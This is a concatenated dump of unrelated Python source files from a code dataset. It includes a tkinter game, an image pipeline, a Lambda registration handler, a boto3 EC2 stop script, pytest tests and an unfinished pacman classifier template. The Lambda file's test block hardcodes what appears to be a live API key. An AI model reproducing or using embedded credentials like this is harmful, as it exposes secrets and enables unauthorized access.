keyboard input to draw the snowman picture \r\ndef keyAdd(event):\r\n if event.char == \"e\" or event.char == \"E\":\r\n presents.drawPresent()\r\n \r\n if event.char== \"y\" or event.char == \"Y\":\r\n presents.drawHat()\r\n \r\n if event.char == \"h\" or event.char == \"H\":\r\n presents.drawCarrot()\r\n \r\n if event.char == \"g\" or event.char == \"G\":\r\n presents.drawButtons()\r\n \r\n if event.char == \"t\" or event.char == \"T\":\r\n presents.drawStar()\r\n \r\n if event.char == \"r\" or event.char == \"R\":\r\n presents.drawLights()\r\n \r\n if event.char == \"d\" or event.char == \"D\":\r\n presents.drawBranch()\r\n\r\n if event.char == \"s\" or event.char == \"S\":\r\n presents.drawEyes()\r\n \r\n if event.char == \"f\" or event.char == \"F\":\r\n house()\r\n \r\n\r\n\r\n#square objects created with coordinates and fill color, can move in any direction, enlarge and change colour \r\nclass Squares:\r\n def __init__(self, x, y, x2, y2, colour):\r\n self.x = x\r\n self.y = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n self.colour = colour\r\n \r\n def moveright(self):\r\n if self.x <= 400:\r\n self.x += 5\r\n self.y = self.y\r\n self.x2 += 5\r\n self.y2 = self.y2\r\n else:\r\n self.x = 0\r\n self.y = self.y\r\n self.x2 = 30\r\n self.y2 
= self.y2\r\n self.draw()\r\n \r\n def moveleft(self):\r\n if self.x2 >= 0:\r\n self.x -= 5\r\n self.y = self.y\r\n self.x2 -= 5\r\n self.y2 = self.y2\r\n else:\r\n self.x = 400\r\n self.y = self.y\r\n self.x2 = 430\r\n self.y2 = self.y2\r\n self.draw()\r\n \r\n def moveup(self):\r\n if self.y2 >= 0:\r\n self.x = self.x\r\n self.y -= 5\r\n self.x2 = self.x2\r\n self.y2 -= 5\r\n else:\r\n self.x = self.x\r\n self.y = 300\r\n self.x2 = self.x2\r\n self.y2 = 330\r\n self.draw()\r\n \r\n def movedown(self):\r\n if self.y <= 300:\r\n self.x = self.x\r\n self.y += 5\r\n self.x2 = self.x2\r\n self.y2 += 5\r\n else:\r\n self.x = self.x\r\n self.y = 0\r\n self.x2 = self.x2\r\n self.y2 = 30\r\n self.draw()\r\n \r\n \r\n def bigger(self):\r\n self.x = self.x\r\n self.y = self.y\r\n self.x2 = self.x2+20\r\n self.y2 = self.y2+20\r\n \r\n \r\n def draw(self):\r\n canvas.create_rectangle(sq1.x, sq1.y, sq1.x2, sq1.y2, fill=sq1.colour)\r\n \r\n def blue(self):\r\n self.colour = \"Blue\"\r\n \r\n def green(self):\r\n self.colour = \"Green\"\r\n \r\n def orange(self):\r\n self.colour = \"Orange\"\r\n \r\n\r\n\r\n \r\n \r\n\r\nsq1 = Squares(100, 120, 130, 150, \"orange\")\r\n \r\n#this listens to what key is pressed which will determine the direction the object will move\r\ndef direction(event):\r\n if event.char == \"d\" or event.char == \"D\":\r\n sq1.moveright()\r\n if event.char == \"a\" or event.char == \"A\":\r\n sq1.moveleft()\r\n if event.char == \"w\" or event.char == \"W\":\r\n sq1.moveup()\r\n if event.char == \"s\" or event.char == \"S\":\r\n sq1.movedown()\r\n\r\n \r\n \r\n \r\n#this function initialises the canvas for the flags game, removes all other redundant widgets\r\ndef moving():\r\n clearForGame()\r\n canvas.delete(ALL)\r\n instructionLabel[\"text\"] = \"\"\"Flags Game\\n\\nUsing 'awsd' keys:\\nHold 'a'--> Left\\nHold 'd'--> Right\\nHold 'w'--> Up\\nHold 's'--> Down\\n\\n\r\n *CHALLENGE*\\n 1.Draw the flag\\n of Finland\\n 2.Draw the flag\\n of Ireland\\n (Hint: Use Enlarge to\\n cover more area)\"\"\"\r\n canvas.configure(bg=\"white\")\r\n counter.reset()\r\n score[\"text\"] = 0\r\n frame2.grid_remove()\r\n frame6.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n canvas.create_rectangle(sq1.x, sq1.y, sq1.x2, sq1.y2, fill=\"orange\")\r\n \r\n ###FRAME AT BOTTOM FOR THE MOVEMENT GAME###\r\n frame5.grid()\r\n ###CONTROL PANEL, DIFFERENT COLOURS AND ENLARGE###\r\n blueButton = Button(frame5, text=\"BLUE\", command=sq1.blue)\r\n blueButton.configure(width=12, bg=\"blue\", fg=\"white\")\r\n blueButton.grid(column=0, row=0)\r\n orangeButton = Button(frame5, text=\"ORANGE\", command=sq1.orange)\r\n orangeButton.configure(width=12, bg=\"orange\", fg=\"white\")\r\n orangeButton.grid(column=1, row=0)\r\n greenButton = Button(frame5, text=\"GREEN\", command=sq1.green)\r\n greenButton.configure(width=12, bg=\"green\", fg=\"white\")\r\n greenButton.grid(column=2, row=0)\r\n biggerButton = Button(frame5, text=\"ENLARGE\", command=sq1.bigger)\r\n biggerButton.configure(width=9, bg=\"gray48\", fg=\"white\")\r\n biggerButton.grid(column=3, row=0)\r\n clearButton = Button(frame5, text=\"CLEAR\", command=moving)\r\n clearButton.configure(width=9, bg=\"gray48\", fg=\"white\")\r\n clearButton.grid(column=4, row=0)\r\n ###LISTEN FOR AWSD KEY###\r\n master.bind(\"<Key>\", direction)\r\n\r\n#clear for Rocket Assembly game\r\ndef clearWhole():\r\n frame1.grid_remove()\r\n frame2.grid_remove()\r\n frame5.grid_remove()\r\n frame6.grid_remove()\r\n 
score.grid_remove()\r\n score.grid_remove()\r\n nameLabel.grid_remove()\r\n nameButton.grid_remove()\r\n dinput.grid_remove()\r\n counter.reset()\r\n frame6.grid()\r\n createForm()\r\n \r\n \r\ndef clearForGame(): #clear for the 2 second shape game\r\n frame1.grid()\r\n frame2.grid()\r\n frame5.grid_remove()\r\n frame6.grid_remove()\r\n score.grid()\r\n nameLabel.grid()\r\n nameButton.grid()\r\n dinput.grid()\r\n canvas.delete(ALL)\r\n instructionLabel[\"text\"] = \"Press Start Button \\nClick within 2 secs\\n\\nGOOD LUCK!\"\r\n canvas.configure(bg=\"white\")\r\n counter.reset()\r\n score[\"text\"] = 0\r\n\r\n\r\n#process the input in the name entry, if there is any\r\ndef getName():\r\n name = dinput.get()\r\n if name:\r\n nameLabel[\"text\"] = \"Name: \"+ name\r\n master.configure(bg=\"green\")\r\n start.configure(bg=\"chartreuse2\")\r\n nameButton.configure(bg=\"chartreuse2\")\r\n dinput.configure(fg=\"green\")\r\n instructionLabel.configure(bg=\"chartreuse2\", width=16, height=20)\r\n\r\n frame1.configure(bg=\"green\")\r\n frame2.configure(bg=\"green\")\r\n\r\n name2 = Label(frame1, text=name, pady=10)\r\n name2.configure(width=32, fg=\"green\",bg=\"chartreuse2\", padx=0, font =(\"Helvetica\", 16))\r\n name2.grid(column=2, row=0)\r\n\r\n else:\r\n nameLabel['text'] = \"NO NAME ENTERED\"\r\n canvas.delete(ALL)\r\n master.configure(bg=\"black\")\r\n start.configure(bg=\"gray32\")\r\n nameButton.configure(bg=\"gray32\")\r\n\r\n frame1.configure(bg=\"black\")\r\n frame2.configure(bg=\"black\")\r\n\r\n\r\n \r\n#initialises the rocket assembly frame\r\ndef createForm():\r\n titleToppings = Label(frame6, text=\"Rocket Assemble\", bg=\"black\",fg=\"white\", padx=20)\r\n titleToppings.grid(row=0,column=0)\r\n addTopping = Label(frame6, text=\"\"\"Target: Land on the Moon\\nINSTRUCTIONS: \\n1.Assume fuel, engines already included.\\n2.Select your components below for your rocket. \\n3.Boosters and command module are essential!\\n4. 
Challenge: Get 100% chance\\n\\nHINT: Adding more components results in a heavier rocket,\\n and a heavy rocket will decrease success rate...\"\"\")\r\n addTopping.grid(row=1,column=0)\r\n \r\n#find out which checkboxes have been pressed then do something\r\ndef getToppings(): \r\n rocket.resetWeight()\r\n if landingvar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n landingLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n landingLabel.grid(column=2,row=6)\r\n if landingvar.get() != 1:\r\n landingLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n landingLabel.grid(column=2,row=6)\r\n \r\n if commandvar.get() == 1:\r\n counter.increment()\r\n commandLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n commandLabel.grid(column=2,row=5)\r\n if commandvar.get() != 1:\r\n commandLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n commandLabel.grid(column=2,row=5)\r\n \r\n \r\n if extravar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n extraLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n extraLabel.grid(column=2,row=4)\r\n if extravar.get() != 1:\r\n extraLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n extraLabel.grid(column=2,row=4)\r\n \r\n if fuelvar.get() == 1:\r\n counter.increment()\r\n rocket.weightinc()\r\n fuelLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n fuelLabel.grid(column=2,row=3)\r\n if fuelvar.get() != 1:\r\n fuelLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n fuelLabel.grid(column=2,row=3)\r\n \r\n if boostersvar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n boostersLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n boostersLabel.grid(column=2,row=2)\r\n if boostersvar.get() != 1:\r\n boostersLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n boostersLabel.grid(column=2,row=2)\r\n \r\n \r\n if rovervar.get() == 1:\r\n rocket.weightinc()\r\n counter.increment()\r\n roverLabel = Label(frame6, text=\"Go for launch\", fg=\"green\")\r\n roverLabel.grid(column=2,row=7)\r\n if rovervar.get() != 1:\r\n roverLabel = Label(frame6, text=\"Not selected\", fg=\"red\")\r\n roverLabel.grid(column=2,row=7)\r\n calculate()\r\n \r\ndef weights():\r\n calculate()\r\n \r\n#calculate the percentage based off the counter and rocket object values\r\ndef calculate():\r\n overallPercentage = 100\r\n chance = overallPercentage-(rocket.getWeight()*10)\r\n percentageLabel [\"text\"] = \"Percentage Chance: {}%\".format(chance)\r\n if counter.getCounter() < 2:\r\n percentageLabel [\"text\"] = \"Percentage Chance: {}%\\n\\n Only {} components selected,\\n rocket is incomplete.\".format(chance, counter.getCounter())\r\n if rocket.getWeight() > 3:\r\n percentageLabel [\"text\"] = \"Percentage Chance: 20%\\n\\n Many heavy components selected,\\n fuel supply will drain before destination\"\r\n if commandvar.get() != 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\\n\\n No Command Module selected!\\nHow will you control the rocket???\"\r\n if boostersvar.get() != 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\\n\\n Cannot leave atmosphere\\nwithout booster rockets\" \r\n if counter.getCounter() == 3 and boostersvar.get() == 1 and commandvar.get() == 1 and landingvar.get() == 1:\r\n percentageLabel[\"text\"] = \"Percentage Chance: 100%\\n\\n SUCCESS\" \r\n counter.reset()\r\n \r\n#reset the checkboxes(unticked)\r\ndef resetCheckboxes():\r\n counter.reset()\r\n percentageLabel[\"text\"] = \"Percentage Chance: 0%\"\r\n 
boostersvar.set(0)\r\n fuelvar.set(0)\r\n extravar.set(0)\r\n commandvar.set(0)\r\n landingvar.set(0)\r\n rovervar.set(0)\r\n rocket.resetWeight()\r\n \r\n\r\nmaster = Tk()\r\nmaster.title(\"Assignment 2\")\r\nmaster.geometry(\"900x600\")\r\nmaster.configure(bg=\"red\")\r\n\r\n###MENU###\r\nmenu_bar= tkinter.Menu(master)\r\nmaster.config(menu=menu_bar)\r\nsub_menu= tkinter.Menu(menu_bar)\r\nsub_menu1= tkinter.Menu(menu_bar)\r\n\r\nmenu_bar.add_cascade(label=\"Canvas\", menu=sub_menu)\r\nsub_menu.add_command(label=\"Shape game\", command=clearForGame)\r\nsub_menu.add_command(label=\"Draw Picture\", command=house)\r\nsub_menu.add_command(label=\"Flags\", command=moving)\r\nmenu_bar.configure(bg=\"gray42\")\r\nsub_menu.configure(bg=\"gray70\")\r\n\r\nmenu_bar.add_cascade(label=\"Checkboxes\", menu=sub_menu1)\r\nsub_menu1.add_command(label=\"Rocket Assembly\", command=clearWhole)\r\nsub_menu1.configure(bg=\"gray70\")\r\n\r\n\r\n###FRAME CONTAINING THE CANVAS###\r\nframe1 = Frame(master, bd=10, bg=\"black\", relief=\"ridge\")\r\nframe1.grid(column=2, row=5, padx=15)\r\ncanvas = Canvas(frame1, width=400, height=300)\r\ncanvas.grid(column=2, row=5, sticky=\"n\")\r\n\r\n\r\nscore = Label(master, text=0)\r\nscore.configure(width=20)\r\nscore.grid(column=1, row=4, padx=10)\r\n\r\n\r\n###START BUTTON###\r\nframe2 = Frame(master, bd=10, bg=\"red\", relief=\"raised\")\r\nframe2.grid(column=1, row=5, padx=10)\r\n\r\nstart = Button(frame2, text=\"START\", command=cb2)\r\nstart.grid(column=1, row=4)\r\nstart.configure(height=5, padx=22, width=5, fg=\"black\", bg=\"pink\")\r\n\r\nstartreset = Button(frame2, text=\"RESET\", command=clearForGame)\r\nstartreset.grid(column=2, row=4)\r\nstartreset.configure(height=5)\r\n\r\n\r\ninstructionLabel = Label(frame1, text=\"INSTRUCTIONS \\n Press Start Button \\nClick within 2 secs\\n\\nGOOD LUCK!\")\r\ninstructionLabel.configure(bg=\"gray78\", width=16, height=20)\r\ninstructionLabel.grid(column=6, row=5, padx=2)\r\n\r\n \r\n\r\n\r\n###NAME ENTRY 3 PARTS AT TOP###\r\nnameLabel = Label(master, text=\"Enter name below:\")\r\nnameLabel.configure(width=21)\r\nnameLabel.grid(column=2, row=1 )\r\ndinput = Entry(master)\r\ndinput.grid(column=2, row=2)\r\ndinput.configure(width=24)\r\n\r\nnameButton = Button(master, text=\"SUBMIT NAME\", command=getName)\r\nnameButton.configure(width=20, bg=\"pink\")\r\nnameButton.grid(column=2, row=4)\r\n\r\n\r\n#frame5 holds the colour buttons for squares\r\nframe5 = Frame(master, bd=10, relief=\"raised\") \r\nframe5.grid(column=2,row=8,pady=15)\r\nframe5.grid_remove()\r\n\r\n\r\nframe6 = Frame(master, bd=10, bg=\"gray95\", width=80) \r\nframe6.grid(column=3,row=10,pady=30,padx=100)\r\nframe6.grid_remove()\r\n \r\n###CHECKBOXES###\r\nboostersvar = IntVar()\r\nboosters = Checkbutton(frame6, text=\"Booster Rockets\",variable=boostersvar).grid(row=2, sticky=W)\r\nfuelvar = IntVar()\r\nfuel = Checkbutton(frame6, text=\"Backup Engine\", variable=fuelvar).grid(row=3, sticky=W)\r\nextravar = IntVar()\r\nextrafuel = Checkbutton(frame6, text=\"Extra Fuel\", variable=extravar).grid(row=4, sticky=W)\r\ncommandvar = IntVar()\r\ncommand = Checkbutton(frame6, text=\"Command Module\", variable=commandvar).grid(row=5, sticky=W)\r\nlandingvar = IntVar()\r\nlanding = Checkbutton(frame6, text=\"Lunar Module\", variable=landingvar).grid(row=6, sticky=W)\r\nrovervar = IntVar()\r\nrover = Checkbutton(frame6, text=\"Lunar Rover\", variable=rovervar).grid(row=7, sticky=W)\r\nsubmitorder = Button(frame6, text=\"Launch\", command=getToppings) 
\r\nsubmitorder.grid(column=2,row=8) \r\nresetrocket = Button(frame6, text=\"Reset\", command=resetCheckboxes) \r\nresetrocket.grid(column=1,row=8) \r\n\r\npercentageLabel = Label(frame6, text=0)\r\npercentageLabel.grid(column=1, row=10)\r\n\r\nmaster.mainloop()\r\n\r\n","sub_path":"ODwyer-Thomas2.py","file_name":"ODwyer-Thomas2.py","file_ext":"py","file_size_in_byte":19755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"639109117","text":"import sys, traceback\nimport cv2\nimport os\nimport re\nimport numpy as np\nimport argparse\nimport string\nfrom plantcv import plantcv as pcv\n\n# Parse command-line arguments\n\n# Main pipeline\ndef main(path,imagename):\n\targs = {'names':'names.txt', \n\t\t\t'outdir':'./output-images'}\n\t#Read image\n\timg, path, filename = pcv.readimage(path+imagename,\"native\")\n\timg1=cv2.resize(img,(2000,4000))\n\t#pcv.params.debug=args['debug']\n\t#img1 = pcv.white_balance(img,roi=(400,800,200,200))\n\tshift1 = pcv.shift_img(img1, 10, 'top')\n\timg1 = shift1\n\ta = pcv.rgb2gray_lab(img1, 'a')\n\timg_binary = pcv.threshold.binary(a, 120, 255, 'dark')\n\tfill_image = pcv.fill(img_binary, 10)\n\tdilated = pcv.dilate(fill_image, 1, 1)\n\tid_objects, obj_hierarchy = pcv.find_objects(img1, dilated)\n\troi_contour, roi_hierarchy = pcv.roi.rectangle(4000, 2000, -2000, -4000 , img1)\n\troi_objects, roi_obj_hierarchy, kept_mask, obj_area = pcv.roi_objects(img1, 'partial', roi_contour, roi_hierarchy,\n\t\t\t id_objects, obj_hierarchy)\n\tclusters_i, contours, hierarchies = pcv.cluster_contours(img1, roi_objects, roi_obj_hierarchy, 1,1)\n\tpcv.params.debug = \"print\"\n\tout = args['outdir']\n\tnames = args['names']\n\toutput_path = pcv.cluster_contour_splitimg(img1, clusters_i, contours, hierarchies, out, file=filename, filenames=names)\nif __name__ == '__main__':\n\tmain()\n","sub_path":"weedpotato.py","file_name":"weedpotato.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395529122","text":"import os\nimport sys\nimport json\nimport hashlib\nimport global_config\nimport datetime\nimport string\nimport shutil\nimport status\nimport errno\n\ndef handle_options_add(cmd_parser):\n cmd_parser.add_argument('-v', '--version',\n help=\"version\",\n action=\"store_true\")\n\n cmd_parser.add_argument('-d', '--dir_path',\n dest='dir_path',\n nargs='+',\n help=\"directories or files for adding to staging area\")\n\n cmd_parser.set_defaults(func=add)\n\ndef copy_to_staged_file(file_path, branch_path):\n \n staged_file = os.path.join(branch_path, global_config.STAGE_DIR, file_path)\n try:\n shutil.copy2(file_path, staged_file)\n\n except IOError as e:\n if e.errno != errno.ENOENT:\n raise\n \n os.makedirs(os.path.dirname(staged_file))\n shutil.copy2(file_path, staged_file)\n\ndef add(args):\n\n if not global_config.check_dlv_exists():\n print(\"No dlv repository exists\")\n sys.exit(0)\n\n if args.dir_path == None:\n print(\"Please enter the directory path\")\n sys.exit(0)\n\n current_branch = global_config.get_current_branch()\n branch_path = os.path.join(global_config.root_dir, global_config.DLV_DIR, current_branch)\n\n for dir_path in args.dir_path:\n\n # Check if the dir or file exists or not\n if os.path.isfile(dir_path):\n copy_to_staged_file(dir_path, branch_path)\n \n # walk over each file in the dir\n for folder, subfolders, files in os.walk(str(dir_path)):\n\n if global_config.DLV_DIR in folder:\n continue\n \n for 
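The shape game in the ODwyer-Thomas2.py record above enforces its 2-second click window by storing time.time() stamps in globals and comparing them inside the click handler. The same deadline can be expressed directly on Tk's event loop with after() and after_cancel(), which removes the globals and never blocks the UI. A minimal self-contained sketch, assuming only the standard tkinter and random modules; the widget names are local to this sketch rather than taken from the record:

import random
import tkinter as tk

root = tk.Tk()
canvas = tk.Canvas(root, width=400, height=300, bg='white')
canvas.grid()

def spawn_target():
    canvas.delete('all')
    x, y = random.randint(0, 370), random.randint(0, 270)
    target = canvas.create_rectangle(x, y, x + 30, y + 30,
                                     fill='blue', outline='red')
    # Schedule the miss: the target disappears after 2000 ms unless clicked.
    # On a miss the game simply stops in this sketch.
    timeout_id = canvas.after(2000, canvas.delete, target)

    def hit(event):
        canvas.after_cancel(timeout_id)  # clicked in time, cancel the expiry
        spawn_target()                   # present the next target

    canvas.tag_bind(target, '<ButtonPress-1>', hit)

spawn_target()
root.mainloop()

after() returns an identifier that after_cancel() revokes, so a hit and a timeout can never both fire for the same target.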
f in files:\n file_path = os.path.join(folder, f)\n if not status.get_status(file_path) == \"Tracked Files\":\n copy_to_staged_file(file_path, branch_path)\n\n","sub_path":"dlv_commands/lib/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"87501288","text":"import os\nimport sys\nfile_dir = os.path.dirname(__file__)\nsys.path.append(file_dir)\n\nimport json\nimport traceback as tb\nfrom service import service_user as service_u \n\ndef handle(event, context):\n try:\n\n body = json.loads(event.get('body'))\n print('body', body)\n \n resp = service_u.serviceUserRegister(body)\n\n if resp[\"statusCode\"] == 200:\n return dict(statusCode = 200, body = json.dumps({\n \"status\": \"COMPLETED\",\n \"data\": resp[\"body\"]\n }))\n else:\n print(resp)\n raise Exception(resp[\"body\"])\n\n except Exception as e:\n #tb.print_exc(e)\n print(\"error\", e)\n if \"FAILED\" in str(e):\n er = json.loads(str(e))\n return dict(statusCode = 500, body = json.dumps({\n \"status\": \"FAILED\",\n \"message\": er[\"message\"]\n }))\n \n \n return dict(statusCode = 500, body = json.dumps({\n \"status\": \"FAILED\",\n \"message\": \"Un error ha ocurrido\"\n }))\n\nif __name__ == \"__main__\":\n payload = json.dumps({\n \"traza_web\": \"\",\n \"email\": \"prueba4@gmail.com\",\n \"password\": \"123456789\",\n \"remote_ip\": \"\",\n \"serverAddr\": \"\",\n \"userAgent\": \"\",\n \"requestMethod\":\"\",\n \"scriptUri\": \"\",\n \"serverSession\": \"\",\n \"session\":\"\"\n })\n headers = {\n 'x-api-key': '6lLxq76Efr4Fm37m42ply87S3Qettsee9oXQiLZx',\n 'Content-Type': 'application/json'\n }\n print(handle({'body': payload}, ''))\n","sub_path":"src/userRegisterFunction/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"473345952","text":"import boto3\nimport time\naws_con=boto3.session.Session(profile_name=\"root\")\nec2_con_re=aws_con.resource(service_name=\"ec2\",region_name=\"us-east-2\")\nec2_con_cli=aws_con.client(service_name=\"ec2\",region_name=\"us-east-2\")\nmy_inst_obj=ec2_con_re.Instance(\"i-08f0f706b4bd5acf6\")\nprint(\"stoping the instances\")\nmy_inst_obj.stop()\nwhile True:\n\tmy_inst_obj=ec2_con_re.Instance(\"i-08f0f706b4bd5acf6\")\n\tprint(\"The instance state is ..\",my_inst_obj.state['Name'])\n\tif my_inst_obj.state['Name']==\"stopped\":\n\t\tbreak\n\ttime.sleep(5)\nprint(\"the state of the instance is \",my_inst_obj.state['Name'])\t","sub_path":"Notes/Udemy/Boto3-refresh/Session-5-waiters/ex-waiters-stop.py","file_name":"ex-waiters-stop.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"272732049","text":"import pytest\n\nfrom admin.governance.dids import get_trusted_registry, get_trusted_partner\nfrom acapy_ledger_facade import create_pub_did\n\nAPPLICATION_JSON_CONTENT_TYPE = {\"content-type\": \"application/json\"}\nBASE_PATH = \"/admin/governance/dids\"\n\n\n@pytest.mark.asyncio\nasync def test_get_trusted_registry(async_client, yoma_agent_mock):\n\n response = await async_client.get(\n BASE_PATH + \"/trusted-registry\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n assert response.status_code == 200\n result = response.json()\n expected_keys = [\"did\", \"posture\", \"verkey\"]\n assert [list(res.keys()) == 
expected_keys for res in result]\n assert len(result) == 1\n\n res_method = await get_trusted_registry(aries_controller=yoma_agent_mock)\n assert res_method == result\n\n\n@pytest.mark.asyncio\nasync def test_get_trusted_partner(async_client, yoma_agent_mock):\n\n # Create a public did\n did_response = await async_client.get(\n \"/wallets/create-pub-did\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n res_json = did_response.json()\n did_created = res_json[\"did_object\"][\"did\"]\n\n # try retrieve the created did from the ledger\n response = await async_client.get(\n BASE_PATH + f\"/trusted-registry/{did_created}\",\n headers={\"x-api-key\": \"adminApiKey\", **APPLICATION_JSON_CONTENT_TYPE},\n )\n\n # check the did is public and on the ledger\n assert response.status_code == 200\n result = response.json()\n expected_keys = [\"did\", \"endpoint\"]\n assert list(result.keys()) == expected_keys\n assert result[\"endpoint\"] != \"\"\n assert result[\"did\"] == did_created\n\n res_method = await get_trusted_partner(\n partner_did=f\"{did_created}\", aries_controller=yoma_agent_mock\n )\n assert res_method == result\n","sub_path":"app/tests/admin/governance/dids/test_dids.py","file_name":"test_dids.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"148468428","text":"import json\nfrom json import JSONDecodeError\n\n\ndef main():\n\n # define a dictionary\n data = {\n \"sandwich\": \"Reuben\",\n \"toasted\": True,\n \"toppings\": [\n \"Thousand Island Dressing\",\n \"Sauerkraut\",\n \"Pickels\"\n ],\n \"price\": 8.99\n }\n\n try:\n\n # serialize json using dumps\n jsonString = json.dumps(data, indent=4)\n\n # print data\n print(jsonString)\n\n except JSONDecodeError as error:\n\n print(error.colno)\n print(error.msg)\n\n\nmain()\n","sub_path":"json_serialize.py","file_name":"json_serialize.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"189470235","text":"\"\"\"data_classifier.py\n\nAuthor: Albert Sebastian & Kevin Blum\nClass: CSI-490-01\nAssignment: Supervised Learning\nDate Assigned: 11/12/17\nDue Date: 11:59 pm 11/27/17\n \nDescription:\nThe code for question seven, creates the enhanced features for pacman\n \nCertification of Authenticity: \nI certify that this is entirely my own work, except where I have been provided\ncode by the instructor, or given fully-documented references to the work of \nothers. I understand the definition and consequences of plagiarism and \nacknowledge that the assessor of this assignment may, for the purpose of \nassessing this assignment:\n Reproduce this assignment and provide a copy to another member of academic\n staff; and/or Communicate a copy of this assignment to a plagiarism checking\n service (which may then retain a copy of this assignment on its database for \n the purpose of future plagiarism checking)\n\nThis code has been adapted from that provided by Prof. 
Joshua Auerbach:\n\nChamplain College CSI-480, Fall 2017\nThe following code was adapted by Joshua Auerbach (jauerbach@champlain.edu)\nfrom the UC Berkeley Pacman Projects (see license and attribution below).\n\n----------------------\nLicensing Information: You are free to use or extend these projects for\neducational purposes provided that (1) you do not distribute or publish\nsolutions, (2) you retain this notice, and (3) you provide clear\nattribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n\nAttribution Information: The Pacman AI projects were developed at UC Berkeley.\nThe core projects and autograders were primarily created by John DeNero\n(denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\nStudent side autograding was added by Brad Miller, Nick Hay, and\nPieter Abbeel (pabbeel@cs.berkeley.edu).\n\nThis file contains feature extraction methods and harness\ncode for data classification\n\nChamplain College CSI-480, Fall 2017\nThe following code was adapted by Joshua Auerbach (jauerbach@champlain.edu)\nfrom the UC Berkeley Pacman Projects (see license and attribution below).\n\n----------------------\nLicensing Information: You are free to use or extend these projects for\neducational purposes provided that (1) you do not distribute or publish\nsolutions, (2) you retain this notice, and (3) you provide clear\nattribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n\nAttribution Information: The Pacman AI projects were developed at UC Berkeley.\nThe core projects and autograders were primarily created by John DeNero\n(denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\nStudent side autograding was added by Brad Miller, Nick Hay, and\nPieter Abbeel (pabbeel@cs.berkeley.edu).\n\"\"\"\n\nimport most_frequent\nimport naive_bayes\nimport perceptron\nimport perceptron_pacman\nimport perceptron_numpy\nimport samples\nimport sys\nimport util\nfrom pacman import GameState\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport logistic\nfrom util import manhattan_distance\n\nTEST_SET_SIZE = 100\nDIGIT_DATUM_WIDTH=28\nDIGIT_DATUM_HEIGHT=28\nFACE_DATUM_WIDTH=60\nFACE_DATUM_HEIGHT=70\n\n\ndef basic_feature_extractor_digit(datum):\n \"\"\"\n Returns a set of pixel features indicating whether\n each pixel in the provided datum is white (0) or gray/black (1)\n \"\"\"\n a = datum.get_pixels()\n\n features = util.Counter()\n for x in range(DIGIT_DATUM_WIDTH):\n for y in range(DIGIT_DATUM_HEIGHT):\n if datum.get_pixel(x, y) > 0:\n features[(x,y)] = 1\n else:\n features[(x,y)] = 0\n return features\n\ndef basic_feature_extractor_face(datum):\n \"\"\"\n Returns a set of pixel features indicating whether\n each pixel in the provided datum is an edge (1) or no edge (0)\n \"\"\"\n a = datum.get_pixels()\n\n features = util.Counter()\n for x in range(FACE_DATUM_WIDTH):\n for y in range(FACE_DATUM_HEIGHT):\n if datum.get_pixel(x, y) > 0:\n features[(x,y)] = 1\n else:\n features[(x,y)] = 0\n return features\n\ndef enhanced_feature_extractor_digit(datum):\n \"\"\"\n Your feature extraction playground.\n\n You should return a util.Counter() of features\n for this datum (datum is of type samples.Datum).\n\n ## DESCRIBE YOUR ENHANCED FEATURES HERE...\n\n ##\n \"\"\"\n features = basic_feature_extractor_digit(datum)\n\n \"*** YOUR CODE HERE ***\"\n \n\n\n\ndef basic_feature_extractor_pacman(state):\n \"\"\"\n A basic feature extraction function.\n\n You should return a util.Counter() of features\n for each (state, action) pair along with a list of 
the legal actions\n\n ##\n \"\"\"\n features = util.Counter()\n for action in state.get_legal_actions():\n successor = state.generate_successor(0, action)\n food_count = successor.get_food().count()\n feature_counter = util.Counter()\n feature_counter['food_count'] = food_count\n features[action] = feature_counter\n return features, state.get_legal_actions()\n\ndef enhanced_feature_extractor_pacman(state):\n \"\"\"\n Your feature extraction playground.\n\n You should return a util.Counter() of features\n for each (state, action) pair along with a list of the legal actions\n\n ##\n \"\"\"\n\n features = basic_feature_extractor_pacman(state)[0]\n for action in state.get_legal_actions():\n features[action] = util.Counter(features[action], **enhanced_pacman_features(state, action))\n return features, state.get_legal_actions()\n\ndef enhanced_pacman_features(state, action):\n \"\"\"\n For each state, this function is called with each legal action.\n It should return a counter with { <feature name> : <feature value>, ... }\n \"\"\"\n 